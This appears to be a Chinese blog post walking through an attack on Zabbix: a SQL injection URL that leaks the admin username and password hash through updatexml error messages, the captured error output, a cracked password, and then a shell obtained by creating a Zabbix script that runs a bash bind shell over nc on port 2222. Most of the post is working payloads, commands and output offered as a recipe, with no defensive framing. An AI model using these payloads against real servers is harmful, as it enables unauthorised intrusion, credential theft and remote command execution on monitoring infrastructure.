Zabbix最新SQL注入及getShell

注入地址:

/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

获取密码:

<code>

<div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (235, 1, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (236, 1, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (237, 1, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,(select(select concat(0x7e,alias,0x7e,passwd,0x7e)) from zabbix.users LIMIT 0,1),1) or 1=1)#)] [XPATH syntax error: '~Admin~2974557a2b57c344a28a3c384']</li></ul></td></tr></table>

</code>

3.破解密码

2b57c344a28a3c38 —>aol321

4.后台登录

5.getShell

后台->Administration->Scripts ->Create Script->Command写入:

<code>

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo

</code>

Execute on选择Zabbix server ->Save

在Dashboard-》选择 Host点击->在出现的窗口点击刚创建的脚本的名字->链接跳转。

6.nc链接2222端口

nc *。*。*。* 2222

7.Shell Got

发表评论

电子邮件地址不会被公开。 必填项已用*标注